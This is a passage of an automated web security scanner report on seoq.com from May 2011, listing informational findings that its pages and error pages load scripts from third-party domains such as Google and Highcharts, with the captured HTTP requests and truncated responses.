24.43. http://www.seoq.com/quotient/2011/04/22/1797/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1797/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/1797/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.44. http://www.seoq.com/quotient/2011/04/22/1798/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/1798/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:36 GMT
Server: Apache
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dlhq4kuanqfrjgsc9kmcb01m25; expires=Mon, 09-May-2011 02:48:38 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.45. http://www.seoq.com/quotient/2011/04/22/2270/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/2270/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:52 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:53 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.46. http://www.seoq.com/quotient/2011/04/22/2271/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/2271/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:19 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:49:19 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.47. http://www.seoq.com/quotient/2011/04/22/2272/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/2272/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.48. http://www.seoq.com/quotient/2011/05/01/2837/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2837/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:51:30 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.49. http://www.seoq.com/quotient/2011/05/01/2838/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2838/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:43 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.50. http://www.seoq.com/quotient/2011/05/01/2839/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2839/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:58 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.51. http://www.seoq.com/quotient/2011/05/01/2840/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2840/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:31 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.52. http://www.seoq.com/quotient/2011/05/01/2841/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2841/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=deleted; expires=Sun, 02-May-2010 02:49:32 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:33 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:34 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...
24.53. http://www.seoq.com/quotient/analysis/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/analysis/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /quotient/analysis/ HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:32:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 14232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
24.54. http://www.seoq.com/web/img/bg-seo-quotient-tool-button.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /web/img/bg-seo-quotient-tool-button.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/img/bg-seo-quotient-tool-button.jpg HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/quotient/analysis/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:33:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=sj9juf9refplohbur110cihta7; expires=Thu, 01-May-2036 08:33:49 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7911
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
24.55. http://www.seoq.com/webstatshq/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webstatshq/favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:29:01 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:29:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.56. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /webstatshq/www.onlinemicrofiche.com HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=doqq36j3lfipqlju261e9vveq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>www.onlinemicrofich
...[SNIP]...
</script>    
   <script type='text/javascript' src='http://www.google.com/jsapi'></script>
...[SNIP]...
<body onload="socialBuzz(escape('onlinemicrofiche.com'));">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.57. http://www.seoq.com/wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=dmrsl377t3kamtrburghhgs7h7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.58. http://www.seoq.com/wp-content/uploads/2008/07/plastic-business-card.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/plastic-business-card.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/plastic-business-card.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=bsdds49l14shn4f75a79hscdv7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
24.59. http://www.seoq.com/wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=thqpn70su4cv7ht7rbrref0ja4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
